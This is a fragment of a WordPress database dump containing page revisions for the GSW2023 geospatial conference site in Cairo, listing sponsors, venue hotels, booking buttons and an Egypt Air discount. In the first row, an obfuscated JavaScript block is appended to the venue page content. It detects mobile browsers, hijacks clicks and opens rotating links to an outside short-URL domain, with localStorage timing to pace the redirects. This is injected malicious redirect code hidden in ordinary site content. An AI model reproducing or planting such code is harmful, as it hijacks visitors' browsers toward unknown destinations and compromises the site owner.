title=\"BOOK NOW\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dhd%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26_PMID%3D99801505%26GPC%3DDY8%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-06-13 23:01:12','2023-06-13 23:01:12','',2679,'https://gsw2023.com/?p=4694',0,'revision','',0),
(4695,1,'2023-06-14 10:45:17','2023-06-14 10:45:17','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" 